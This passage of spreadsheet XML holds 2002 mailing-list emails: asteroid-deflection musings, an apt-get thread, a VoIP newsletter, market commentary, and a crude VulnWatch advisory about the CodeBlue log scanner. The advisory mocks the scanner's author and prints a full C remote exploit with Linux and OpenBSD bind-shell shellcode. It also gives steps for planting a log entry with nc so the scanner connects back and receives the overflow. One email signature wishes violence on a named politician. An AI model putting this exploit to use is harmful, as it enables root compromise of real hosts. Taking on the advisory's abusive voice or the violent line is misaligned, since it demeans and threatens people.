smaller than the relative velocity, the difference is probably insignificant.)  And they assume there are no other effects on the asteroid's path. What about electrical charges?  Could we electrically charge the asteroid and another nearby asteroid, perhaps with electron beams, to provide the needed acceleration? Of course, all of this calculation could be applied in the other direction, too.  If you want to sock a moon colony with a one-ton asteroid, you could do it with a tiny amount of force applied over twenty-five years to adjust its orbit. *** About spam: I'm sorry to admit I haven't implemented any of the better solutions, and so I'm afraid I'll have to allow non-subscriber FoRK mail to be detained for scanning.  I hope this measure can be reversed soon when I have time to implement better measures.  As has often been noted by other posters, measures to reduce spam sent to the FoRK list will not significantly decrease the spam load of FoRKposters, since the vast majority of spam received by FoRKposters is sent to them directly, not through the FoRK list. --         Kragen Sitaker      Silence may not be golden, but at least it's quiet.  Don't speak unless you can improve the silence.  I have often regretted my speech, never my silence. -- ancient philosopher Syrus (?) via Adam Rifkin,  [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Thu, 25 Jul 2002 04:27:22 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 04:27:22 -0500</t>
  </si>
  <si>
    <t>Re: apt-get...universe (was: Sylpheed with GNOME 2</t>
  </si>
  <si>
    <t>On Thu, 25 Jul 2002 11:07:00 +0200, Matthias Saou  wrote: &gt; Once upon a time, Lance wrote : &gt;  &gt; &gt; Well, from the looks of things, I can import all my mail settings from &gt; &gt; Evolution to Sylpheed.  Has anyone successfully run Sylpheed in Gnome &gt; &gt; 2.0?  I noticed with 'apt-get install gnome-session' from the 'rpm &gt; &gt; [URL]http://apt.sunnmore.net[/URL] gnome2 73' repository, Sylpheed isn't one of the &gt; &gt; packages selected for deletion. &gt;  &gt; I think that's simply because Sylpheed isn't a GNOME application, but a &gt; "simple" gtk+ one. It needs no GNOME libs at all, so upgrading to GNOME 2 &gt; but keeping gtk+ 1.2 will let you keep Sylpheed with no problem.     Yeah, mine works here; I did about the same thing.     Hey: "Universe"   I saw this keyword on the gstreamer website.  They said something like "If you're feeling froggy and want to jump into it, use apt-get gstreamer-universe" but I've not gotten the syntax of it right, to get "all" of a project yet.  Has anyone used this yet? ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ I don't want to hear news from Isreal until the news contains the words "Bullet", "Brain", and "Arafat". _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://apt.sunnmore.net http://www.CounterMoon.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: "SearchNetworking" &lt;searchNetworking@lists.techtarget.com&gt;\nFrom: "SearchNetworking" &lt;searchNetworking-ED20D7B9A49E402C@lists.techtarget.com&gt;\nDate: Thu, 25 Jul 2002 04:00:12 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 04:00:12 -0400 (EDT)</t>
  </si>
  <si>
    <t>"SearchNetworking" &lt;searchNetworking-ED20D7B9A49E402C@lists.techtarget.com&gt;</t>
  </si>
  <si>
    <t>"SearchNetworking" &lt;searchNetworking@lists.techtarget.com&gt;</t>
  </si>
  <si>
    <t>VoIP tip: Troubleshooting voice</t>
  </si>
  <si>
    <t>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= SEARCHNETWORKING | Voice over IP Tip July 25, 2002 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  FROM OUR SPONSOR: Looking for RISK FREE VoIP? [URL]http://searchNetworking.com[/URL],,4689,00.htm?quintum ________________________________________________________________  IN THIS ISSUE | Table of Contents  1. VOIP TIPS     - Troubleshooting voice    - VoIP enable your telephony    - Understanding delay 2. IMPORTANT ANNOUNCEMENTS AND LINKS    - Network management/VoIP/wireless strategies revealed    - SearchNetworking Webcast archives     - Featured Topic: Networks of the future    - Expert response: Ted Studwell answers your questions    - Featured book: Microsoft encyclopedia of networking ____________________________________________________________________ ***********************&gt;&gt; SPONSORED BY QUINTUM &lt;&lt;******************* LOOKING FOR RISK FREE VoIP? Get a RISK FREE VoIP solution that is easy to install and cost-effective. Quintum Tenor(R) MultiPath Switches assure voice QoS. PATENTED SelectNet provides real-time MID-CALL failover from IP to public switched phone network. PacketSaver voice compression reduces bandwidth use 50%.  NATAccess works behind NAT-enabled firewalls. 2 port SOHOs to carrier solutions at: [URL]http://searchNetworking.com[/URL],,4689,00.htm?quintum =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= TROUBLESHOOTING VOICE | By Tom Lancaster When you're troubleshooting voice calls, particularly the signaling, it's often helpful to look at the detailed output of the device, be it a voice-enabled router, telephony server, gateway or whatever.  This detailed output can be in the form of logs or debug output as is the case in Cisco's IOS.  In any case, this output is likely to be somewhat cryptic.  One of the reasons is because this output often uses a set of standardized codes and it is simply easier to put more information on the screen using a short number than it is to write an essay about why some event happened. Read the entire tip at:  [URL]http://www.searchNetworking.com[/URL],289483,sid7_gci840618,00.html Got a VoIP tip of your own? Why not send it in? We'll post it on our Web site, and we'll enter you in our tips contest for some neat prizes.   Submit your tip here: [URL]http://searchnetworking.techtarget.com[/URL],289485,sid7,00.html Like this tip?  Hate it?  Email us at mailto:tips@searchnetworking.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= VoIP ENABLE YOUR TELEPHONY | By Tom Lancaster One of the reasons VoIP has been slowly gaining traction is that large enterprises have quite a lot of legacy equipment, and migrating to VoIP from the circuit-switched networks of yore is no easy feat. These environments are typically complicated and the stakes are high because so many mission-critical systems rely on telephony. Click here for the full tip: [URL]http://searchnetworking.techtarget.com[/URL],289483,sid7_gci779073,00.html =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= UNDERSTANDING RELAY | By Tom Lancaster Everyone knows that delay is one of the two primary causes of poor voice quality, particularly in VoIP networks, but where does this delay come from?  Delay is generally defined as the time it takes from the instant you speak into the phone until the instant that sound is regenerated on the far end. Quite a few things have to happen to transport this sound through the system, so delay actually has many components. Read the entire tip here: [URL]http://searchnetworking.techtarget.com[/URL],289483,sid7_gci823706,00.html ___________________________________________________________________  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ::::::::::  DON'T MISS THESE IMPORTANT MESSAGES AND LINKS  :::::::: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NETWORK MANAGEMENT/VoIP/WIRELESS STRATEGIES | SearchNetworking SearchNetworking.com hosts the Networking Decisions conference in Chicago, October 16-18. Sessions focus not only on essential network management strategies, but feature critical insight on VoIP and wireless. You find out how to best prepare for these technologies now so you won't get left behind, the benefits to gain/pitfalls to avoid, plus the real ROI for your organization. Get the full story right here: [URL]http://www.networkingdecisions.com[/URL] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= WEBCAST ARCHIVES | SearchNetworking If you missed the original airing of our Webcast on the best practices for availability and performance management with Jon Oltsik, don't fret, it's available for you to view at your leisure.  And, while you're at it, take a look at all our previously aired Webcasts, as well our upcoming live events.  We're sure you'll find topics that interest you.  View of archive on best practices for availability and performance management with Jon Oltsik: [URL]http://searchnetworking.techtarget.com[/URL],289693,sid7_gci832106,00.html  View our upcoming events and Webcast archive list here: [URL]http://searchnetworking.techtarget.com[/URL],289675,sid7,00.html =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   NETWORKS OF THE FUTURE | SearchNetworking Featured Topic Last week we attended Burton Group's Catalyst Conference and heard all about the hottest trends in networking: VPNs, VoIP, wireless, identity management, and Web services. Read more about the issues surrounding each topic. Click here for the current Featured Topic: [URL]http://searchnetworking.techtarget.com[/URL],290042,sid7_gci839778,00.html =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   EXPERT ADVICE: TED STUDWELL | Voice over IP Expert Dear Ted, Where can we get information about Inmarsat services?  &gt;&gt; Click for Ted Studwell's response: [URL]http://searchnetworking.techtarget.com[/URL],289625,sid7_cid478713_tax292243,00.html &gt;&gt; Click here for other Q&amp;As with Ted that you might find useful: [URL]http://searchnetworking.techtarget.com[/URL],289620,sid7_tax292243,00.html &gt;&gt; Click here to pose your VoIP question to Ted Studwell: [URL]http://searchnetworking.techtarget.com[/URL],289624,sid7_cid466224_tax292243,00.html =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= FEATURED BOOK | SearchNetworking Bookstore Title: Microsoft encyclopedia of networking Author: Mitch Tulloch, and Ingrid Tulloch Description: This second edition of the award-winning Microsoft encyclopedia of networking has been fully updated with thousands of entries detailing the latest technologies, standards, products, and services. You get clear, concise explanations, including hundreds of new articles and diagrams that deftly take you from concept to real-world application. You also get the entire encyclopedia on CD-ROM, for definitive answers wherever you need them. &gt;&gt; Click here for ordering information: [URL]http://www.digitalguru.com[/URL] ____________________________________________________________________  :::::::::::::::::::  SEARCHNETWORKING CONTACTS   :::::::::::::::::::   SUSAN FOGARTY, Site Editor (sfogarty@techtarget.com)     &gt;&gt; Send us your suggestions for tips and articles.  ____________________________________________________________________   KARA GATTINE, Assistant Site Editor (kgattine@techtarget.com)    &gt;&gt; Send your white papers, tips and best Web link recommendations. ____________________________________________________________________   BETH QUIMBY, News Editor (bquimby@techtarget.com)     &gt;&gt; Send in your product announcements and poll ideas.  ____________________________________________________________________   GABRIELLE DERUSSY (gderussy@techtarget.com)     &gt;&gt; Sponsor this or any other TechTarget newsletter.  ____________________________________________________________________  ::::::::::::::::::::  ABOUT THIS NEWSLETTER   :::::::::::::::::::::  Created by TechTarget ([URL]http://www.techtarget.com[/URL]   TechTarget - The Most Targeted IT Media   Copyright 2002, All Rights Reserved.   Unsubscribe from 'Voice Over IP Tips'  - Simply Reply to this Email with REMOVE within the Body or Subject &gt;  or  - Go to: [URL]http://searchNetworking.techtarget.com[/URL]  - Log in to edit your profile.  - Click on the link to Edit email subscriptions.  - Uncheck the box next to the newsletter you wish     to unsubscribe from.  - When finished, click "Save Changes to My Profile."</t>
  </si>
  <si>
    <t>http://searchNetworking.com http://searchNetworking.com http://www.searchNetworking.com http://searchnetworking.techtarget.com http://searchnetworking.techtarget.com http://searchnetworking.techtarget.com http://www.networkingdecisions.com http://searchnetworking.techtarget.com http://searchnetworking.techtarget.com http://searchnetworking.techtarget.com http://searchnetworking.techtarget.com http://searchnetworking.techtarget.com http://searchnetworking.techtarget.com http://www.digitalguru.com http://www.techtarget.com http://searchNetworking.techtarget.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: harley@argote.ch (Robert Harley)\nDate: Thu, 25 Jul 2002 02:57:59 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 02:57:59 +0200 (CEST)</t>
  </si>
  <si>
    <t>James Rogers wrote:\n&gt;I don't think a ballistic missile defense system will be much help\n&gt;against a rock a couple thousand kilometers in diameter.\n\nThat would destroy Earth completely!  The one in question is 2.06 km\n(1.28 miles) in diameter.\n\nR\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;,\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Thu, 25 Jul 2002 02:45:45 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 02:45:45 -0400</t>
  </si>
  <si>
    <t>Buy? (was Re: It's back? Triple-digit Dow gains at 2PM...)</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 A bull market climbs a wall of worry -- on record volume. Yeah, I know, it's different this time. Pay no attention to the bear behind the curtain, and all that. However, at the end of the *last* bear market, in 1983 -- yup, that long ago -- Granville sell-orders caused bloodbaths with boring regularity, a stockholm-syndrome economy had recently been delivered of Keynesian monetary apparatchiks at the Fed and elsewhere, and Henry "Dr. Doom" Kauffman opined offhand that interest rates *might* come down finally... and pop! went the market, sending the NYSE volume through the roof. (Record volume then was around a hundred mill. Yesterday, ladies and germs, it was upward of 2 point something *billion* shares).. Back then, I was a mail-cart-pushing, key-punching "administration" clerk at Morgan Stanley in Chicago, chief scrounge for a bunch of Masters of the Universe, and everybody at Morgan thought the resulting price-pop was just a technical rally and wouldn't last either. :-). Six months later, people *still* said it wouldn't last, and a girlfriend's uncle was saying that it was too late, he'd missed the train, so he was going to stay out 'till the market came back down a bit. By that time, the Dow was at, what, 1600? I wonder if he's still out, waiting... A 40% decline is a big chunk of change, boys and girls, even if it's 40% of a bubble. Actually, by my count, it's 100% of the bubble, but that's just me. After all, Amazon and EBay's P/Es still need a pressurized cabin to breathe in. So, yes, the market may go lower, but not much more, relatively speaking. At some point, and fairly soon, I bet, someone's going to realize that, even though you wouldn't want to actually trade one for a house, tulips are still nice things to have around. Hint: Interest rates are rediculuously low, they aren't going up any time soon, and, if we can survive the election, the recently-started CEO witch-hunt won't be too much more than Street theater, probably not resulting in much in the way of regulation or legislation. The threat of which, frankly, probably caused this recent explosive decompression in the first place. Your tax dollars at work, if you will. So, in light of the erstwhile bloodbath on Capital Hill, and the real one we just saw a few days ago in the market, it may be time for people to remember what Mr. Rothschild said, and buy now while there's blood in the streets. As to whether the accounting is "rigged", remember what Robert Heinlein said: "Who cares if the game is rigged? You can't win if you don't play." Cheers, RAH The aforementioned girlfriend, by the way, traded *me* in for an actual Rothschild in 1984, after I insisted on going back to school and talking my way into the back door at the University of Chicago to boot. The cost of anything being the foregone alternative, it sometimes seems to me I'm *still* paying for that detour, but that's a bear of a different color, and it's okay as long as I don't look behind the curtain, right? :-). - --- begin forwarded text From: Somebody Else To: "R. A. Hettinga"  Subject: Re: It's back? Triple-digit Dow gains at 2PM... Date: Wed, 24 Jul 2002 21:44:19 -0600 Bob, So.  Let's see.  The market's all the way back up to... what? Last Friday's close? Iiiiirrraaational iinnndeed. - ----- Original Message ----- From: "R. A. Hettinga"  To: "Digital Bearer Settlement List"  Sent: Wednesday, July 24, 2002 2:02 PM Subject: RE: It's back? Triple-digit Dow gains at 2PM... &gt; At 2:55 PM -0400 on 7/24/02, Somebody wrote: &gt; &gt; &gt; &gt; The market doesn't close for two hours. &gt; &gt; The market just closed. Up 496.63, 6.45%, at 8198.9697. &gt; &gt; :-). &gt; &gt; You never catch the upticks if you don't stay in the market... &gt; &gt; Cheers, &gt; RAH &gt; &gt; -- &gt; ----------------- &gt; R. A. Hettinga  &gt; The Internet Bearer Underwriting Corporation  &gt; 44 Farquhar Street, Boston, MA 02131 USA &gt; "... however it may deserve respect for its usefulness and &gt; antiquity, [predicting the end of the world] has not been found &gt; agreeable to &gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman &gt; Empire' &gt; - --- end forwarded text -----BEGIN PGP SIGNATURE----- Version: PGP 7.5 iQA/AwUBPT+eg8PxH8jf3ohaEQJaJACferw1H2dZWXUEkFKdJ3bVpSJ5QnQAoPoD +oIb0wFbSjKC4hdc/DSjPkvj =pRCH -----END PGP SIGNATURE-----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URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: vulnwatch@vulnwatch.org\nFrom: Demi Sex God from Hell &lt;doe@orbital.wiretapped.net&gt;\nDate: Thu, 25 Jul 2002 02:05:00 +1000 (EST)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 02:05:00 +1000 (EST)</t>
  </si>
  <si>
    <t>Demi Sex God from Hell &lt;doe@orbital.wiretapped.net&gt;</t>
  </si>
  <si>
    <t>vulnwatch@vulnwatch.org</t>
  </si>
  <si>
    <t>[VulnWatch] Remote hole in Codeblue log scanner</t>
  </si>
  <si>
    <t>TITLE: Potential remote root in CodeBlue log scanner NAME: DEMI SEX GOD FROM HELL ADV 00001 DATE: YES, PLEASE MAIL ME IF YOU ARE FEMALE (send pictures) CRAZY TRACKING NUMBER THAT MAKES IT LOOK LIKE I HAVE SOME MASSIVE DATABASE OF JUAREZ: 7363A64B02 Props to dme@#! Information ----------- you may remember me from sweaty nights of passion, or perhaps from yesterday when i announced the release of a piece of software i wrote (many years ago too btw). in general i received no feedback from this, cept from one guy having problems downloading it (howd that go btw?) and then this: From: "Michael" To: "'Demi Sex God from Hell'" Subject: RE: ass the attack spoofing shell Annoying. Pointless. well! how very very rude. that really was uncalled for. (propz to dme yo!). gay, bi or curious, i went to find out more about mystical michael, who is obviously very important as he is the only one who felt the need to tell me they didnt like me. it turns out, hes a bit of programmer, with some code available on his website ([URL]www.tenebrous.com[/URL] I got codeblue, (btw mystical mike your auto-download script for you counter gives me a 500 error), a log checking utility mystical mike wrote and released under the GNU GPL to make the world a better place. If this tool is run as root (say nightly from roots crontab) there is a potential remote root. in any case, regardless of user, there is always a remote. if codeblue is locally suid, theres many overflows all throughout it, easy peasy like the girls in st patricks!!!. Note st patricks is a great place in sydney, playground of the rich and famous. visit it if you ever visit sydney, tell them i sent you. so lets have a walk through the code, and get a feel for mystical mike, the man behind the mystic. (do you wear a crazy robe with a hood like a monk mike?) $ cd codeblue $ ls CHANGES     COPYING     Makefile    README      codeblue.c $ head COPYING                     GNU GENERAL PUBLIC LICENSE                        Version 2, June 1991  Copyright (C) 1989, 1991 Free Software Foundation, Inc.      59 Temple Place, Suite 330, Boston, MA  02111-1307  USA  Everyone is permitted to copy and distribute verbatim copies  of this license document, but changing it is not allowed.                             Preamble /* uh-oh */ $ vi codeblue.c /*  * $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01  * root Exp root $  *  ******************************************************************************************  *                      -[ G O D  B L E S S  A M E R I C A ]-  *  ******************************************************************************************  *  *            CodeBlue v5.0 by Michael (mystic@tenebrous.com)  *  This software is freely distributable under the terms of the GNU/GPL.  *                    Please see file 'COPYING' /* god bless america, AND mystical mike! */ .... /* line ~273 */ /*  * siginal_init:  * sets up all the signals we'd like  * to handle specially  */ void signal_init(void) {     struct sigaction sa_old, sa_new;     /* signal handling */     sa_new.sa_handler = signal_handler;     sigemptyset(&amp;sa_new.sa_mask);     sa_new.sa_flags = 0;     sigaction(SIGINT, &amp;sa_new, &amp;sa_old);     sigaction(SIGPIPE, &amp;sa_new, &amp;sa_old); } /* shared signal handler doing all sorts of stuff, not very good mike :( */ /* line ~289 */ /*********************************************************************  * Our close() wrapper  */ int Close(int sd) {     return (close(sd)); } /* that just made me laugh */ /* line ~661 */ char logline[512]; /* logline is global */ int scan_file(FILE * fp) {     char buffer[1024]; ....         fgets(buffer, 1024, fp); ....         if (found_infected == 1) { /* if it picks up a worm entry in the */ 				   /* log this is true */             strcpy(logline, buffer); 	    /* oh dear */ /* line ~827 */ char reply[512]; /* global */ char whoispath[512] = "/usr/bin/whois"; /* global */ int main(int argc, char **argv) {  	.....             if (argv[i][0] == '-')                 switch (argv[i][1]) {                 case 'e':{      /* return email address */                         if ((!argv[i + 1]) || (argv[i + 1][0] == '-'))                             DieWithRequire(argv[i]);                         strcpy(reply, argv[i + 1]);                         break;                     }                 case 'p':{      /* path to whois binary */                         if ((!argv[i + 1]) || (argv[i + 1][0] == '-'))                             DieWithRequire(argv[i]);                         strcpy(whoispath, argv[i + 1]);                         break;                     } 	/* whoops! */ Now, all this is good for a laugh, but unless its suid, not much use :( CodeBlue will scan apache/squid logfiles looking for code red and nimda log hits. If it finds a hit, it will connect to the source ip adress of the hit and send an email warning of infection. Unfortunately, mystical mike was too far up on his high horse to write something decent. The function that does this is send_email() (line ~552) It starts off like this: int send_email(void) { 	int sd; 	char *host = malloc(sizeof(char) * 512); /*  .... silly crap using popen and stuff .... */ 	/* host is the infected host from the logfiles  	 * this will connect to the host on port 25 	 */     if ((sd = smtp_connect(host)) &lt; SUCCESS)         return -1; /* Step 0 - Get initial server response */     get_smtp_reply(sd); /* this is the function of interest */ /* line ~345 */ /*********************************************************************  * fetches a reply from the SMTP server  */ int get_smtp_reply(int sd) {     char response[1024]; /* this is the remote host's mail server buf */ 	....     /*      * We'll loop infinately, receiving      * 1 byte at a time until we receive a carriage return      * or line-feed character, signifying the end of the output      */ 	/* GEE! THAT SOUNDS LIKE A GOOD IDEA MYSTICAL MIKE#@!#@! */ 	....     while (TRUE) {         if (select((sd + 1), &amp;rset, NULL, NULL, &amp;tv) &lt; 0) {             if (errno != EINPROGRESS) {                 fprintf(stderr, "[ ERROR: select() failed: %s\n",                         strerror(errno));                 return -1;             }         }         if (recv(sd, (int *) &amp;response[i], 1, RECV_FL) &lt; 0) { /* Hello */             if (errno == EAGAIN) {                 if (elapsed &gt;= smtp_timeout) {                     fprintf(stderr, "[ ERROR: operation timed out\n");                     fprintf(log, "..... ERROR: operation timed out\n");                     return -1;                 }                 elapsed++;                 usleep(smtp_timeout * 10000);                 continue;             } else {                 if (!(flags &amp; FL_BEQUIET))                     fprintf(stderr, "[ ERROR: recv() failed: %s\n",                             strerror(errno));                 fprintf(log, "..... ERROR: recv() failed: %s\n",                         strerror(errno));                 return -1;             }         }         if ((response[i] == '\n')             || ((response[i] == '\n') &amp;&amp; (response[i + 1] == '\n')))             break;         i++; /* come here often baby? */     } So slowly but surely, response is overrun, unless it its a newline. /*  * hi, this is an exploit that doesnt work. it should be enough of a point in  * the right direction though. the overflow is in get_smtp_reply(), codeblue.c  * is pretty damn poor, there are more!!!  *  * being in a funny mood one afternoon, i made some software publicly  * available, the next morning i see this in my mailbox:  *  * ------- begin spouting off  ------  * From mystic@tenebrous.com Mon Jul 22 19:50:46 2002  * Return-Path:  * Delivered-To: doe@orbital.wiretapped.net  * Received: (qmail 2711 invoked from network); 22 Jul 2002 19:50:45 -0000  * Received: from mail110.mail.bellsouth.net (HELO imf10bis.bellsouth.net)  * (205.152.58.50)  *  by orbital.wiretapped.net with SMTP; 22 Jul 2002 19:50:45 -0000  * Received: from Michaels ([68.16.174.6]) by imf10bis.bellsouth.net  *         (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP  *         id &lt;20020722195143.XJOI21884.imf10bis.bellsouth.net@Michaels&gt;  *         for ; Mon, 22 Jul 2002 15:51:43 -0400  * From: "Michael"  * To: "'Demi Sex God from Hell'"  * Subject: RE: ass the attack spoofing shell  * Date: Mon, 22 Jul 2002 15:50:13 -0400  * Message-ID: &lt;000101c231b8$fedc7740$0200a8c0@Michaels&gt;  * MIME-Version: 1.0  * Content-Type: text/plain;  *	charset="us-ascii"  * Content-Transfer-Encoding: 7bit  * X-Priority: 3 (Normal)  * X-MSMail-Priority: Normal  * X-Mailer: Microsoft Outlook, Build 10.0.2616  * Importance: Normal  * X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000  * In-Reply-To:  * Status: RO  *  * Annoying. Pointless.  *  * ------- end spouting off -------  *  * HOW RUDE!@##@!@#!  *  * so i had a visit to [URL]www.tenebrous.com[/URL], found some software written by this  * master coder, and here we are now.  *  * To use this against a webserver (A) using codeblue.  *  * $ printf "GET /scripts/root.exe\r\n\r\n" | nc A 80  *  * this will add an entry in the access log.  *  * ON THE SAME HOST:  *  * # ./mystic_anus 25  *  * wait a while.  *  * when codeblue runs it will pull your ip from the logs, connect to your port  * 25 and try to send you a mail. because mystic is an idiot, you will get a  * shell with the openbsd code!!!  *  * i like exclamation marks !!!!  *  * krad haxxor props: dedmunk (happy now#@!!#@) ph1ll1p, caddis, buo, solace,  * everyone on #cw , everyone in paris (you have a lovely city, i had a lovely  * time last weekend, thankyou!!!) dedmunk, everyone at netcraft (esp Mike,  * hi!), everyone in sydney, dedmunk, everyone i go drinking with, anyone who  * lives in london, marlinspike (yo!), the woman who sells me my cigarettes in  * the morning on the way into work, thomas greene, dedmunk, adam, durab, sh00ter.  *  * BIG SHOUT OUT TO TOLIMAN AND ZERO SUM, UNDERSTAND!!  *  * propz to dme#!@#!@  *  * dont forget:  *  * $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01 root Exp root $  *  ******************************************************************************************  *                      -[ G O D  B L E S S  A M E R I C A ]-                             *  ******************************************************************************************  *  */ #include  #include  #include  #include  #include  #include  #include  #include  #include  #define OF 2048 /* this is bigger than needed */ /* Optimized the code, now it works better in bad situations */ /* i dont know who wrote this, sorry, if you wrote it, let me know */ char lunix_shellcode[]= "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"; /*  shell on port 6969/tcp shellcode for OpenBSD by noir */ long bsd_shellcode[]= {   0x4151c931,0x51514151,0x61b0c031,0x078980cd,   0x4f88c931,0x0547c604,0x084f8902,0x0647c766,   0x106a391b,0x5004478d,0x5050078b,0x68b0c031,   0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,   0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,   0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,   0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,   0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,   0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,   0x90416873 }; int main(int argc, char *argv[]) { 	struct 	sockaddr_in sock_in; 	struct 	sockaddr_in sock_out; 	char 	*port = "25"; 	int 	fd, a; 	int 	len; 	int		opt; 	char bigbuf[OF]; 	char *p; 	long lunix_resp = 0xbfffe0ac; 	long bsd_resp = 0xdfbfc068; 	char *moo = "220 "; 	long resp = lunix_resp; 	char *shellcode = lunix_shellcode; 	printf("strlen scode = %d\n", strlen(shellcode)); 	if (argc == 2) 		port = argv[1]; 	if (argc &gt; 2) { 		fprintf(stderr, "usege: %s [port]\n", argv[0]); 		exit(1); 	} 	resp += 8; 	p = bigbuf; 	memcpy(p, moo, 4); 	p += 4; 	memset(p, '\x90', 1020 - strlen(shellcode)); 	p += 1020 - strlen(shellcode); 	memcpy(p, shellcode, strlen(shellcode)); 	p += strlen(shellcode); 	memcpy(p, &amp;resp, 4); 	p += 4; 	memcpy(p, &amp;resp, 4); 	p += 4; 	memset(p, '\n', 4); 	if ((fd = socket(PF_INET, SOCK_STREAM, 0)) &lt; 0){ 		perror("socket"); 		exit(1); 	} 	memset(&amp;sock_in, 0, sizeof(sock_in)); 	sock_in.sin_family = AF_INET; 	sock_in.sin_port = htons(atoi(port)); 	sock_in.sin_addr.s_addr = INADDR_ANY; 	len = sizeof(sock_in); 	opt = 1; 	if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &amp;opt, sizeof(int)) == -1) { 			perror("setsockopt"); 			exit(1); 	} 	if (bind(fd, (struct sockaddr *)&amp;sock_in, len) &lt; 0) { 		perror("bind"); 		exit(1); 	} 	if (listen(fd, 5) &lt; 0) { 		perror("listen"); 		exit(1); 	} 	printf("listening on port %d\n", atoi(port)); 	for (;;) { 		len = sizeof(sock_out); 		if ((a = accept(fd, (struct sockaddr *)&amp;sock_out, &amp;len)) &lt; 0){ 			perror("accept"); 			exit(1); 		} 		printf("got a connection from %s\n", inet_ntoa(sock_out.sin_addr)); 		fflush(stdout); 		write(a, bigbuf, sizeof(bigbuf)); 		close(a); 	} 	return(1); }</t>
  </si>
  <si>
    <t>www.tenebrous.com www.tenebrous.com</t>
  </si>
  <si>
    <t>JPN</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: harley@argote.ch (Robert Harley)\nDate: Thu, 25 Jul 2002 01:31:26 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 01:31:26 +0200 (CEST)</t>
  </si>
  <si>
    <t>John Hall spake thusly:\n&gt;It has been brought up that a boss no longer marries his secretary.\n\nWot, is she not cute???\n\n\nRe: Asteroids anyone ?\n\nNot another one.\nHmm... the NASA page gives Impact Probability = 3.9e-06.\nOne in 250000.\nWhat, me worry?\n\n\nL8r,\n  R\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: kra@monkey.org\nFrom: grlygrl201@aol.com\nDate: Thu, 25 Jul 2002 00:06:41 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 00:06:41 -0400</t>
  </si>
  <si>
    <t>kra@monkey.org</t>
  </si>
  <si>
